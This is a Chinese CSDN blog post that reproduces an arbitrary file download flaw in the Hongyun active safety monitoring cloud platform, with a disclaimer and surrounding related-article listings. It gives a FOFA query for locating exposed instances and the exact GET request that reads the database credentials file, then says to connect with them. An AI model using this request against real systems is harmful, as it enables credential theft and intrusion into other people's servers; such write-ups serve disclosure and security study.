漏洞复现--鸿运主动安全监控云平台任意文件下载

已于 2023-10-12 19:40:31 修改
阅读量749 收藏 2
点赞数
分类专栏: 漏洞复现 文章标签: 网络安全 web安全 安全
于 2023-10-12 17:01:59 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53003652/article/details/133794830
版权

免责声明:

**文章中涉及的漏洞均已修复,敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行
**

一:漏洞描述

深圳市强鸿电子有限公司鸿运主动安全监控云平台存在任意文件下载漏洞,攻击者可通过此漏洞获得登录账号密码,以进行后续测试。

二:漏洞影响版本

鸿运主动安全监控云平台

三:网络空间测绘查询

fofa:
body="./open/webApi.html"

四:漏洞复现

GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties
image.png
image.png

五:漏洞利用

读取到数据库账号密码,直接连接
在这里插入图片描述

芝士土包鼠
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
鸿运主动安全监控云平台任意文件下载漏洞复现 [附POC]
薛定谔嘚喵博客
10-25 719
监控云平台实现对计算资源、存储资源、网络资源、应用服务进行7*24小时全时区、多地域、全方位、立体式、智能化的IT运维监控,保障IT系统安全、稳定、可靠运行。 深圳市强鸿电子有限公司鸿运主动安全监控云平台存在任意文件下载漏洞,攻击者可通过此漏洞获得登录账号密码,以进行后续测试。
漏洞复现安全云平台存在任意文件下载getshell
失心少年
10-13 738
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!深圳市强鸿电子有限公司鸿运主动安全云平台存在任意文件下载漏洞,攻击者可通过此漏洞下载敏感文件信息。1.利用GET请求如下POC可得到验证。
主动安全监控User-信息泄露漏-0day未公开漏洞
weixin_43167326的博客
02-23 799
主动安全监控是一种基于计算的安全监控解决方案,它利用先进的技术手段,实时监测和分析网络环境中的安全事件和威胁,旨在主动发现和预防潜在的安全风险。通过主动安全监控,企业可以实现对网络流量、系统日志、用户行为等数据的全面采集和分析,及时发现异常事件和潜在威胁,并采取相应的防御措施,从而保障企业的信息安全主动安全监控不仅具备高效的数据处理能力,还提供了丰富的安全策略和管理工具,方便企业根据自身需求定制安全策略,实现精细化的安全管理。
鸿运主动安全监控云平台存在任意文件读取漏洞 附POC
nnn2188185的博客
11-29 313
微信公众号搜索:南风漏洞复现文库 该文章 南风漏洞复现文库 公众号首发鸿运主动安全监控云平台实现对计算资源、存储资源、网络资源、应用服务进行7*24小时全时区、多地域、全方位、立体式、智能化的IT运维监控,保障IT系统安全、稳定、可靠运行。
鸿运主动安全云平台任意文件下载漏洞复习
qq_44005305的博客
03-05 1112
深圳市强鸿电子有限公司鸿运主动安全监控云平台网页存在任意文件下载漏洞,攻击者可通过此漏洞下载网站配置文件等获得登录账号密码。
鸿运主动安全云平台任意文件下载漏洞
CommputerMac的博客
10-12 431
深圳市强鸿电子有限公司鸿运主动安全云平台存在任意文件下载漏洞,攻击者可通过此漏洞下载敏感文件信息,获取数据库账号密码,从而为下一步攻击做准备。例:读取数据库配置文件。
鸿运主动安全监控云平台任意文件下载漏洞
qq_67810151的博客
02-24 398
深圳市强鸿电子有限公司鸿运主动安全监控云平台存在任意文件下载漏洞,攻击者可通过此漏洞获得登录账号密码,以进行后续测试。
鸿运(通天星CMSV6车载)主动安全监控云平台任意文件读取
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
02-27 644
鸿运主动安全监控云平台实现对计算资源、存储资源、网络资源、应用服务进行7*24小时全时区、多地域、全方位、立体式、智能化的IT运维监控,保障IT系统安全、稳定、可靠运行。鸿运主动安全监控云平台StandardReportMediaAction_getImage存在任意文件读取漏洞,攻击者可利用该漏洞读取系统敏感文件。鸿运(通天星CMSV6车载)主动安全监控云平台
鸿运猴年PPT动画.rar
07-16
这是一套鸿运猴年PPT动画,第一PPT模板网提供幻灯片动画免费下载; PPT动画是一个红色条幅样式的“鸿运猴年”大字,伴随着四周红色边框的出现,红色的叶子渐渐飘散;本PPT动画使用了淡淡的中国风风格PPT背景,可供...
深圳鸿运装饰城营销推广报告-51DOC.docx
10-14
综上所述,这份营销推广报告详细规划了深圳鸿运装饰城的市场营销策略,从战略制定到具体执行步骤,再到价值定位和入市时机的选择,展现了房地产营销的全面性和系统性。在实际操作中,每个环节都需要精细的策划和严谨...
2015鸿运羊年PPT模板下载.ppt
09-29
很抱歉,但根据您给出的信息,“2015鸿运羊年PPT模板下载.ppt”这个文件标题和描述,并不包含具体的IT知识点。标签“技术”虽然与IT相关,但在没有更具体的内容或者详细说明的情况下,无法提供超过1000字的详细IT...
鸿运羊年ppt模板下载
10-19
在下载并解压后,用户可以直接在PowerPoint程序中打开这个文件,开始编辑和定制自己的新年PPT。在编辑时,注意保持模板的整体风格统一,避免过于繁杂的元素干扰主题,同时确保信息传递的清晰性和有效性。 总的来说...
广东鸿运电镀技术公司不锈钢反应釜爆炸事故-平安管理网.docx
11-14
广东鸿运电镀技术公司不锈钢反应釜爆炸事故-平安管理网.docx
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8390
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
怎么在网络攻击中屹立不倒
dexun123的博客
08-12 744
在当今蓬勃发展的网络游戏产业中,服务器安全无疑是企业生存与发展的基石。面对互联网环境中无处不在的DDoS(分布式拒绝服务)与CC(挑战碰撞)攻击威胁,游戏服务器的防御能力与高效处理能力显得尤为重要。相较于追求综合性能平衡的普通服务器,游戏服务器必须专注于构建坚不可摧的安全防线与流畅无阻的游戏体验,以抵御外部侵扰,确保玩家沉浸于无缝的游戏世界。
安全工具推荐-Search_Viewer资产测绘】
qq_55213436的博客
08-14 187
Search_Viewer,集Fofa、Hunter鹰图、Shodan、360 quake、Zoomeye 钟馗之眼、censys 为一体的空间测绘gui图形界面化工具,支持一键采集爬取和导出fofa、shodan等数据,方便快捷查看。包含语法帮助手册,忘记查询语法也能方便查看语法,渗透不二之选。
安全入门day.02
mxxcxy的博客
08-14 1036
这里使用小皮面板部署网页(1)点击安装程序开始安装,在自定义选项中修改安装位置,根据自己实际安装位置设定,作者这里安装在C盘作为演示(2)点击立即安装,等待进度条走完(3)点击安装完成执行程序(4)如果出现以下界面就是安装成功了(5)根据设定的软件安装位置,部署网站,软件根目录下面有3个文件夹,第一个COM文件夹是小皮面板的配置文件,第二个Extensions文件夹是存放已经安装的软件环境,例如php、mysql和Apache等;
网络安全(黑客)自学
最新发布
白帽子凯哥聊黑客
08-16 779
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、等哪个领域,都有攻与防两面性,例如 Web安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

芝士土包鼠

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值